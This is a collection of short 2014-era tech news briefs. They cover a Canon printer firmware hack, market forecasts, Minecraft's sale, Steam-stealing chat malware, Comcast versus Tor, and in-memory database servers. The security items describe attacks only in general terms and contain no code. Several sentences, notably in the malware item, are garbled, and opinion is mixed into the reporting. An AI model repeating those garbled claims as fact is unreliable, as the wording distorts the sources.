Doom for hacked printer

doom_sprite_wallpaper_by_bobspfhorever78-d6lij4oIn what has to be the best proof of concept hacking of a printer, Context Information Security analyst Michael Jordon managed to get a Canon Pixma printer to run the game Doom.

Jordon said that Canon Pixma wireless printers have a web interface that shows information about the printer, for example the ink levels, which allows for test pages to be printed and for the firmware to be checked for updates.

He found that the interface doesn’t need any sort of authentication to access and while you would think that the worst that anyone could do is print off hundreds of test pages and use up all of the printer’s ink, Jordon found a hacker could do a lot more damage.

The interface lets you trigger the printer to update its firmware. It also lets you change where the printer looks for the firmware update.

A hacker could create a custom firmware that spies on everything that printer prints, it can even be used as a gateway into the network.

To show what was possible Jordon got the printer to run Doom.

Canon offers very little protection against this. If you can run Doom on a printer, you can do a lot more nasty things. In a corporate environment, it would be a good place to be.

Who suspects printers?  Well other than Nigel from accounts and he thinks aliens are trying to take over the coffee machine.

Canon has promised that it is working on a fix and is taking a chainsaw to the problems highlighted by Contecxt.

“All PIXMA products launching from now onwards will have a username/password added to the PIXMA web interface, and models launched from the second half of 2013 onwards will also receive this update, models launched prior to this time are unaffected,” Canon said.

 

UK biggest public sector IT spender

ukflagWhile the UK is the biggest IT public spender, growth is very slow.

That’s according to a report from IDC, which surveyed western European spending in the IT sector.

The big five western European countries – the UK, Germany, France, Spain and Italy –  represent over 75 percent of the $53 billion spent on hardware, software and IT services by the different government.  Over 50 percent of the spend takes place in local government.

IDC says that public administration and compulsory social activities are larges spenders within the sector.

It predicts that investment in pension administration, tax and revenue collection managment will grow more than investments in public safety and security.  Some areas, however, such as immigration and borders are attracting spends.

Germany will show the highest compound annual growth rate with a measly 1.2 percent, while Spain and Italy will suffer the biggest slump.

Toshiba releases 20 megapixel sensor

Toshiba imageThe chip division of Japanese giant Toshiba said it has started making fast 20 megapixel CMOS image sensors aimed at the high end smartphone market. Samples went out last month and full production will start in February next year.

That type of censor will give a smartphone the kind of capabilities more associated with high end and expensive digital cameras.

The sensor, bilt on a 1.12 micron CMOS process has an optical size of ½.4 inch and lets camera modules on smartphones be built to a-height of 6mm or less.  The chip has a pixel count of 5384×3752 with digital zoom capabilities, and includes 16Kbit memory.

The sensor – dubbed the T4KA7 – ddelivers a frame rate of 22 frames per second at full resolution image capture.  That’s an improvement of 83 percent compared to Toshiba’s previous 20MP sensor.

A Toshiba representative said that the sensor will let manufacturers to design next generation ultrathin, power aware high end mobile products.

The sensor will cost around $20 when bought in volumes.

Toshiba said that the CMOS image sensor market will experience a compound annual growth rate (CAGR) of 10 percent between 2013 and 2018, with revenues reaching $13 billion.

Big Data gets very big indeed

server-racksRevenues for Big Data technology and services will be worth $41.5 billion by 2018 and is growing now at a 26.4 percent compound annual growth rate (CAGR).

That’s an estimate by market research company IDC. Ashish Nadkarni, research director at the company, said the hype was simmering down.  “This is a sign that the technologies are maturing and making their way into the fabric of how organisations operate and firms conduct their business,” he said.

This year, infrastructure has a large share of the entire market, with a 48.2 percent slice of the Big Data pie.

While America leads the way in Big Data investment, it isn’t going to stay that way. EMEA and Asia Pacific have nearly 45 percent market share in infrastructure, software, and services.

IDC predicts there will be a mergers and acquisitions boom in the sphere.

Microsoft coughs $2.5 billion for Mojang

Microsoft campusSoftware giant Microsoft said it has bought Mojang, which makes the video game Minecraft for $2.5 billion.

The Swedish company has sold over 50 million copies but the three founders will leave the company.

Mojang said on its website change is scary, but “it is going to be good though. Everything is going to be OK.”

Mojang said Minecraft had grown and grown like Topsy.  “Though we’re massively proud of what Minecraft has become. It was never Notch’s intention for it to get this big.”

“Notch” is the brains behind Minecraft and the majority shareholder.  He doesn’t want to run such a big company and the pressure was getting too much. “The only option was to sell Mojang. He [Notch] will continue to do cool stuff though. Don’t worry about that.”

Driverless car growth set to surge

Rolls Royce Silver GhostA staggering 42 million driverless vehicles will be on our roads by 2035.

That’s the prediction of market research company ABI Research which said the numbers of driverless cars will ramp from 1.1 million in 2024 to over 42 million in 2035.

But these optimistic forecasts don’t take into account bottlenecks including user acceptance, security, liability and regulation.

Google has already been forced by the California Department of Motor Vehicles to test prototypes with steering wheel, brake and acceleration pedals installed.

Tesla said last week that it will move into the driverless car market but other car manufacturers are havering over making a decision.

“While autonomous driving under the control of a human standby driver is quickly gaining acceptance, robotic vehicles mostly remain out of bounds, especially for car manufacturers, despite Google’s recent announcement to start prototype testing. However, only driverless vehicles will bring the full range of automation benefits including car sharing; driverless taxis, and delivery vans; social mobility for kids, elderly, and impaired; and overall economic growth through cheaper and smoother transportation critical in an increasing number of smart mega cities. Many barriers remain but the path towards robotic vehicles is now firmly established with high rewards for those first-to-market,” said ABI Research director Dominique Bonte.

Majority of mobile apps are insecure

SmartphonesA Gartner report claimed that 75 percent of mobile applications fail the most basic security tests.

That poses threats for corporations, it said.  Enterprise employees download apps and also use mobile apps to access business networks. Such apps can violate enterprise policies and expose enterprises to threats.

Dionisio Zumerle, a principal analyst at Gartner said: “Enterprises that embrace mobile computing and bring your own device (BYOD) strategies are vulnerable to security breaches unless they adopt methods and technologies for mobile application security testing and risk assurance  Most enterprises are inexperienced in mobile application security. Even when application security testing is undertaken, it is often done casually by developers who are mostly concerned with the functionality of applications, not their security.”

He claimed that vendors supplying static and dynamic application testing can prevent problems on the enterprise.  And a new test, called behavioural analysis, is emerging for mobile apps.

He added: “Today, more than 90 percent of enterprises use third-party commercial applications for their mobile BYOD strategies, and this is where current major application security testing efforts should be applied,” said Mr Zumerle. “App stores are filled with applications that mostly prove their advertised usefulness. Nevertheless, enterprises and individuals should not use them without paying attention to their security. They should download and use only those applications that have successfully passed security tests conducted by specialized application security testing vendors.”

Often the biggest problem is misconfiguring devices, so for example by misusing personal cloud service through apps on smartphones and tablets.

Turin places a shroud on Microsoft

turinThe Italian city of Turin, famous for its medieval Jesus shroud hoaxing, is dumping Microsoft and heading toward something more Open Saucy.

Turin is currently running Windows XP which goes to show that not only is its famous shroud mediaeval.

Apparently Turin thinks that it can save €6 million over five years by switching from Windows XP to Ubuntu Linux in all of its offices.

The plan is to install it on 8,300 PCs, which will generate an immediate saving of roughly €300 per machine. This figure is made up by the cost of Windows and Office licences.

Another good reason why Turin did not want to upgrade to Windows 8 is that its computers were so old their designs were found in Leonardo Da Vinci’s scrapbooks and it was not believed that the new Windows would run very well on them.

The switch to Ubuntu was officially approved in early August and is expected to take around a year and a half to complete.

The move has been talked about for two years. The project was temporarily put aside due to economic concerns — it probably would have been too costly switching from XP while Turin still had valid and paid licences running. Now that those Windows licences are expiring, however, the time is ripe to experiment with new products.

Turin is one of the biggest municipalities in Italy to switch to Open Source and it could be an example for other cities to follow.

Pishing Eskimo twitches to steal Steam Wallet

Greenland in the 19th century - picture Wikimedia CommonsA new piece of pishing malware has taken over Twitch’s user pool tempting users to go into a fake sweepstake or lottery, so that it can nick cash from their Steam Wallets.

For those who came in late, Twitch is a video game-centric website on which people show live streams of game play to others. Amazon bought the site and it has about 50 million users, paying $970 million in cash.

Dubbed Eskimo, the malevolent bot does not look out of place to usual visitors to the streaming site — live streamers, who earn cash via viewer subscriptions, frequently use bots in the chat area of their channels to push donations, inspire supporters and run promotions.

However one of the bots has been cleaning out Steam inventories, which might hold rare digital collectibles, and Steam Wallets, which are source by real-world funds to purchase games on Valve’s admired distribution platform.

F-Secure said Eskimo can wipe your Steam wallet, armory, and inventory dry. It even dumps your items for a discount in the Steam Community Market. Earlier variants were selling items with a 12 percent discount, but a recent sample showed that they changed it to 35 percent discount — to sell the items faster.

According to F-Secure, Eskimo requests users to track a link to fill out a form for a raffle, which it claims provides them an opportunity to win digital weapons and collectibles for Counter-Strike: Global Offensive.

As it has the right to use a Steam account, will get screenshots, add new friends on Steam, accept friend requests, deal with new friends, buy items with Steam funds, send trade offers and accept trades, F-Secure says Eskimo. Once all of a user’s money has been used to purchase collectibles, the malware will trade all of the victim’s digital items to their new “friends.”

F-Secure says, “It might be helpful for the users if Steam were to add another security check for those trading several items to a newly added friend and for selling items in the market with a low price based on a certain threshold. This will help in lessening the damages done by this kind of threat.”

 

Apple’s iPhone 6 chip is a lemon

CD153It looks like Apple’s new iPhone 6 will have the same performance of its older gizmos according to Hot Hardware benchmarking 

Normally one of the few things that is different about the new model iPhone is a that it comes with a better chip.  Last time it was the A7 System-on-Chip (SoC) which was the world’s first 64-bit smartphone processor.

Even Apple naysayers said that the A7 chip was rather good and dominated benchmark runs and consistently outperformed previous generation iPhone models.

However if Apple fanboys were hoping for a performance bump from the iPhone 6 and iPhone 6 Plus, both of which sport a custom A8 SoC they are going to be disappointed.

Hot hardware noted only modest gains compared to the iPhone 5s. The dual-core 1.4GHz Cyclone CPU and A8 GPU, the iPhone 6 scored 21,204.26 and a earned a place at the top of the chart, though not by much. The iPhone 5s scored 20,253.80 in the same benchmark so the iPhone 6 is less than 5 percent faster than the iPhone 5s.

What is strange is that not only was everyone expecting a better performance gain the iPhone 6 launch live stream implied that the difference would be huge.

Apple said that the all-new A8 chip is our fastest yet. Its CPU and graphics performance are faster than on the A7 chip, even while powering a larger display and incredible new features. And because it’s designed to be so power efficient, the A8 chip can sustain higher performance.

Well it is sort of true – the chip is faster, but not by enough for anyone to notice.

According to Apple, it offers 84x faster graphics performance than the original iPhone and is up to 50x faster in CPU performance.

Hang on a minute, Apple is comparing its current chip with that of the first iPhone which was released in  June 29, 2007. Of course, the iPhone 6 is going to be faster. However, this means that Apple is aware that its new chip is disappointing and it is trying to pretend it is hot.

World moves to smartphones

shoe phoneFortune tellers at the Groupe Speciale Mobile Association (GSMA) have been consulting their tarot cards and are predicting that either there will be a tall dark stranger who will ask them out to lunch, or by the end of the decade, there will be nine billion mobile connections across the globe.

If it is the latter meaning, GSMA predicts that while three billion of those connections will be data terminals, dongles, routers and feature phones, the other two thirds will be smartphone handsets.

The organisation claims that the smartphone market is poised for huge growth over the next six years.  There are currently two billion handsets in active use.  It predicts that the demand is being driven by people in emerging countries.

In a report with the catchy title,  Smartphone forecasts and assumptions, 2007-2020, the GSMA said that developing economies overtook mature markets such as the US and western Europe in 2011.

GSMA chief strategy officer Hyunmi Yang said that in the hands of consumers, these devices are improving living standards and changing lives, especially in developing markets, while contributing to growing economies by stimulating entrepreneurship.

“As the industry evolves, smartphones are becoming lifestyle hubs that are creating opportunities for mobile industry players in vertical markets such as financial services, healthcare, home automation and transport,” he said.

Asia Pacific already accounts for half of global smartphone connections yet smartphone penetration is still below 40 percent in the region, even when China’s 629 million smartphone connections are included.

By the end of the decade, emerging countries will account for four in five smartphone connections, as regions like North America and Europe hit the 70-80 percent mark and growth drops off.

The fastest growing region is expected to be sub-Saharan Africa. When figures are based on smartphone adoption as a percentage of all mobile connections, the region currently has the lowest adoption rate of 15 percent in the world.

However, the wider availability of affordable handsets and the roll-out of networks are expected to change everything.

The GSMA claims that the main factors driving smartphone adoption in emerging countries is falling prices. The price difference between feature phones and smartphones is getting smaller and smaller and $50 smartphones are now a reality.

Mature markets have seen operator subsidies and the roll-out of 4G networks helping to maintain growth in the premium end of the market, while more intelligent, individualised data plans are also helping to win consumers over from feature phones in all markets.

“Smartphones will be the driving force of mobile industry growth over the next six years, with one billion new smartphone connections expected over the next 18 months alone,” said Yang.

Comcast declares war on Tor

Newspaper Seller, 1939The most popular telco in the US, famous for its happy customers and commitment to a positive future for an open internet, Comcast has declared war on the encrypted system Tor.

Comcast agents have contacted customers using Tor and instructed them to stop using the browser or risk being cut off.

According to Deep Dot Web one Comcast agent named Jeremy insisted Tor an “illegal service” and was against usage policies. The Comcast agent then repeatedly asked the customer to tell him what sites he was accessing on the Tor browser. Of course the customer told him to go forth and multiply.

What is scary is that Comcast knew that any customer was using Tor. This would mean that Comcast is spying on the online activities of its users.

There is some bad blood between Tor and Comcast. The Tor project has listed Comcast as a Bad ISP. The Tor project cited Comcast’s Acceptable Use Policy for its residential customers which claims to not allow servers or proxies.

A Comcast spokesperson insisted that the outfit did respect customer privacy and security and would only investigate the specifics of a customer’s account with a valid court order.

However, this did not happen in the case of Comcast’s treatment of Ross Ulbricht, alleged Dread Pirate Roberts.

Comcast previously collaborated with the FBI by providing information on alleged Silk Road mastermind Ross Ulbricht’s internet usage. Ulbricht was most certainly never given a warning by Comcast or given time to contact a lawyer before he was arrested in a San Francisco library last October.

 

Intel shows off in-memory-database Biz

Intel-IDF-'14-Copy-SizeIntel’s Developer Forum 2014 annual meeting at San Francisco’s Moscone Center wound down yesterday. My assignment is to continue research on a technology that’s now ramping.

The computer industry is at the beginning of a major architectural shift – “In-Memory Database” (IMD) systems, originally aimed at solving near real-time solutions for analytic problems have successfully been applied to cognitive computing problems as well. The nascent application of “cognitive computing intelligence and predictive analytics” toolsets to IMD equipped servers is thought to be the first step in a new era in computing – quite possibly the next big thing.

The Google Effect
At the 2000 Intel Developer Forum in San Francisco a relatively unknown entrepreneur, while having a Keynote fireside chat with Andy Grove, said he’d like to take the entire Internet and put it in memory to speed it up – “The Web, a good part of the Web, is a few terabits. So it’s not unreasonable,” he said. “We’d like to have the whole Web in memory, in random access memory.”

The comment received a rather derisive reception from the audience and was quickly forgotten. The speaker, Larry Page, an unknown at the time, as was his startup company, Google – the company’s backbone consisted of 2,400 computers at the time.

Fast forward to the present – system vendors found their future in Big Data has a lot of the look and feel of Google’s “free to the public” offering. Google was the first to successfully deploy a massively parallel processing (MPP) network commercially using commodity servers – one that was delivering real-time data access on a worldwide basis. Their competitors realized that they could no longer remain competitive with systems that relied on high latency rotating magnetic media as the main store – in fact, solid state disks (SSD) are considered somewhat slow for the new realities of Big Data analytic computing.

The development – called “In-Memory Database” mounts the entire database (single system image – even enormous ones) into large scale memory arrays of Registered DIMMs – closely coupled with Multi Core Processors. The resulting increase in throughput accelerates not only transaction processing but also analytic application performance into real time. The frosting on the cake is that this architecture change applies to good advantage in the emerging cognitive computing space.

SAP – HANA, In-Memory Database Computing
In 2006 Hasso Plattner, Co-founder of SAP AG, took a bottle of red wine, a wine glass, some writing implements and paper to the garden behind his house. By the time he reached the bottom of the bottle there wasn’t much written on the paper. But he had reached the conclusion that in-memory systems were the future. Mr. Plattner had realized that for SAP to remain competitive it needed to innovate – Plattner believed that by changing the server design to accommodate massively parallel processing with enough memory to load an entire database when combined with columnar based storage software would have a revolutionizing effect on processing speeds for OLTP and OLAP applications.

Gathering a small group of PhDs and undergrads at the Hasso Plattner Institute, Plattner expressed the in-memory idea he wanted them to explore. The first prototype was shown in 2007 before an internal audience at the company’s headquarters in Waldorf, Germany. SAP management was skeptical that the idea would work – the team needed to prove that the concept of in-memory database would work under real world conditions.

Using contacts to advance the project, Mr. Plattner persuaded Colgate-Palmolive Co. to provide transaction data for the project. He also persuaded Intel’s Craig Barrett to secure the latest microprocessors for the labs ongoing effort. The company also set up an R&D facility in Palo Alto to be in close proximity to their innovation and research partner Stanford University.

SAP HANA was officially announced in May 2010 with shipments commencing with the release of SAP HANA 1.0 in November. The market was slow in adopting the technology convinced that it was still in an early stage of development. Analytics and the need to score a real reason for their customers to mount their IT to the cloud provided the market conditions SAP’s HANA needed to press its adaptation. SAP over time adopted HANA to the Cloud through successful partnering with a wide array of vendors making it the company’s fastest growing segment.

During the development of HANA, SAP discovered the amount of physical memory required to store an entire database could be reduced substantially (compressed) – in some cases by 100X. This had the effect of reducing power (less memory required) and made database searches more efficient (reduction of the empty set). The market implication was that the price of memory per gigabyte had finally reached a price/performance breakeven point in an application that could not be accomplished at that price any other way. DRAM producers have found their next “Killer Application”.

IBM’s Watson – Cognitive Computing Public Debut
IBM’s Watson is a Big Data analytics system running on 2,880 PowerPC cores with 16TBytes of DRAM. Estimated cost is reportedly just over $3 Million and it requires 200kW of power to operate. Watson’s inner workings have not been publicly released – what is known is that it runs under a tool IBM calls DeepQA, implemented in conjunction with Hadoop (a Java implementation of MapReduce) that runs under the SUSE Linux Enterprise Server Operating System.

IBM introduced Watson to the public by competing it against human opponents on the game show “Jeopardy” in February 2011 – establishing IBM and the Watson Brand in the public mind when it won the $1 Million Dollar prize for charity.

Watson’s ability to semantically interpret language implies a native ability to understand the context of questions – including puns and word plays that it handled amazingly well – questions of this nature typically remain a significant challenge for machine-based systems.

Watson’s creators have stated that the algorithms are “embarrassingly” parallel – the implication that the core engine is highly MapReduce in nature rather than the more traditional graph analytics approach. Conventional network control is adequate for such an engine reducing costs and falls within a Software Defined Networking (SDN) framework.

IBM previously missed the industry shift to data management from ISAM files to relational databases in the 1970’s even though they were the inventor of RDMS systems. Oracle took full advantage of this colossal gaff much to IBM’s dismay.

IBM announced the establishment of the Watson Business Unit in early March investing upwards of $1 Billion in the new entity. What is surprising is that the company had a fully established cloud based offering replete with a supporting ecosystem around Watson (now physically occupying three rack cabinets instead of the original nine). There is no lack of customer interest in Watson with over 1,000 third party developers signed on to date.

IBM emphasizes Watsons’ natural language capabilities and analytics to process and synthesize information in a manner similar to the way humans think – enabling quick comprehension and evaluation of large of amounts of human style communication data to generate and evaluate evidence based hypotheses – to adapt and learn from training, interaction and outcomes.

Server Commoditisation – IBM Going Fabless?
“Watson” is at the beginning of a bundling “strategy” by IBM that’s in line with its continued separation from its hardware origins. IBM’s internal politics sometimes show in decisions made by disparate groups within the company in efforts to preserve their own “silage”.

The persistent and widely spread rumor that IBM was selling their low-end server division began circulating in April 2013 with Lenovo the most likely buyer – it passed into obscurity before becoming a reality in January 2014. The trend toward server hardware commoditization is the driving force behind the sale. Margins in the low-end server space have decreased to the point where economies of scale must come into play – requiring ever-larger investments with ever decreasing margins draining capital away from the company’s core business strategy. Watson, on the other hand, is viewed as a “maximum best-fit scaling technology” for capitalizing on IBM’s capabilities as a company.

Recent rumors that IBM is accepting bids for its semiconductor operations are being taken seriously and lean toward Global Foundries as the favored bidder. IBM announced that it is investing $3 Billion over five years on semiconductor research in a move to reassure their customer base that the company is continuing basic research to advance hardware and software technology. The company has entered talks of selling the East Fishkill, N.Y. Fab to Globalfoundries Inc. though a definitive agreement has yet to be announced.

IBM is slowly being transformed into a mostly software and services company using commodity, software defined hardware. That it’s going fabless is no surprise – the question of who will fill the void of developing next generation semiconductor processes and the attendant processor architecture development.
In 2013 the odds were firmly on Intel – the lack of furthered commitment in IDF 2014 shakes this conclusion but remember that the E7 version will not be ready for prime time till next year or at best very late this calendar year.

Collaboration
IBM, deciding to take Watson to market, set out to solve cost, power and footprint issues through industry collaboration. The effects of this collaboration will have far ranging effects on the company, its hardware product line and industry partners.

IBM’s larger than usual presence at the Intel Developer Forum in 2013 with a keynote delivered by Diane Bryant, Intel Senior Vice President and General Manager of the Data Center Group further signaled IBM’s continued segue with Intel toward high end servers.
Intel’s Rack Scale Architecture

Intel has been developing its version of the “Disaggregated Server” named “Rack Scale Architecture” or RSA.

At the core of the Rack Scale Architecture is a technology Intel calls “Silicon Photonics” – developed under the premise that a system wide integrated silicon photonic based data highway woven into a hierarchical communication fabric will support massively parallel computing systems into the foreseeable future and remain a baseline architectural model for future growth. Copper interconnects do not scale reliably in server systems at data rates much above 10 Gbs per channel (multiple fiber channels (10) are combined to establish interconnects like 100 Gbit Ethernet).

The idea of a “silicon photonic” highway offers system architects freedom to allocate computational resources “at will”. This blends well with Software Defined Networking down to the computational element – essentially making an entire data center a virtual machine.

Key to this idea is the use of fiber optic cable capable of carrying 100 Gbps and up data channels (cluster of 4 fibers at 25 Gbps each) called “Silicon Photonics” by Intel.

Diane Bryant brought Andy Bechtolsheim – Founder, Chief Development Officer and Chairman of Arista Networks on stage to announce the company’s first shipments of the “Top of Rack Switch”. Bechtolsheim stated that Intel’s Silicon Photonic’s solved the cost issue allowing Arista’s TOR Switch to enter the market. Andy added that switches extending transmission distance from 200 meters to 2 kilometers required for Cloud data centers would be shipping in volume in Q1 CY 2015.

Intel’s Big Data Analytics Market Outlook
Diane Bryant saved the best for last in her keynote segment. She stated that McKinsey reported big data analytics can improve margins up to 60% through increased sales per visit through improved management of inventory and through optimized product pricing. Cost of compute has declined 40% and the cost of storage has declined 100% making it truly cost feasible to deploy these big data analytic solutions. She added that the E5V3 analytic server units were announced in a separate announcement on Monday. Unfortunately nothing was said about the massive E7s now in development.

Hadoop
Bryant went on stating “within a couple of years Hadoop will be the number one application. It will be running on more servers than any other single application. It will be more common for Enterprise IT than Enterprise ERP system. The big data market is growing at 35% CAGR it’s projected to be a $150 Billion business in silicon systems, software and professional services by 2020.”

TechEye Take Away
We’re not sure what happened between IBM and Intel. Comparing IBM’s presence last year compared to this year’s IDF was completely different. Relationships between companies can take wild swings over internal problems that are kept far from the public eye and we suspect that this may well be operative here. IBM is most interested in the E7 version which remains unannounced though sources report this is scheduled for some time in Q1 2015. We think the apparent lack of mutual devotion is temporary and helps to quiet internal silo wars at IBM for the time being.

Do not be surprised if Intel’s Data Centre Group breaks out into a separate, standalone forum next year.

Intel is working on multiple technology fronts to develop next generation data center architectures capable of real time transaction processing and analytical processing. Keep also in mind that these machines are completely capable of running Cognitive Intelligent Computing currently the domain of IBM but will first ramp in 2015 in an application span called Cognitive Analytics.

Remembering that analytics also includes voice and real-time voice translation leaves wide implications into a number of consumer space applications – think of a gate keeper service melded into cellular phone contracts.

In any regards Mark Bohr is still holding court over Intel’s process development – one of the company’s solid IDF anchors that’s still left at the company. The news is that Intel can build 14 nm FinFet 300 mm wafers in volume and is well on its way to 7 nm with a stop at 10 nm.

BlackBerry buys a UK company

blackberry-juicerMobile manufacturer BlackBerry said it has bought a UK company Movitu. Financial details of the transaction weren’t revealed.

Movitu makes so called virtual identities for mobile operators that lets many numbers to be active on a single device.

BlackBerry said this help device management for bring your own device (BYOD) and corporate environments.

The Movitu Virtual SIM platform lets business numbers and personal numbers be used on the same device with separate billing for voice, for data and for messaging.

The advantage is that employees can use the same phone for both company business and their own personal use.

The Virtual SIM capabilities will be offered by BlackBerry through mobile operators for all main smartphone operating systems, including Android, iOS and Windows.

Curved screens don’t yet make the grade

curvyA report said that even though products from Samsung and LG that use flexible OLED materials for displays, they’re not really curved screens yet.

Strategy Analytics (SA) said Samsung’s launch of the Note Edge last week and the LG G-Flex a few months back took curved screens one step closer to reality.

However, SA said that these smartphones are not really flexible screens but rather have curved rigid screens.

OLED screens offer a number of benefits over LCD screens because they are lighter, thinner and probably last longer.

But these devices are the precursors to truly flexible second generation screens which will offer new deisgn such as smartphones with tablet sized foldable screens.

“A number of challenges will need to be overcome,” said Stuart Robinson, director at Strategy Analytics. “More of the phone’s components need to be flexible to make a truly flexibile phone, not just the display. This includes the cover material, the batteries as well as the semiconductors and other components.”

Other challenges include tools and processes that will allow cost effective volume production, he said. The thinks it’s likely that flexible OLED displays will become the preferred display tech in products within the next 10 years.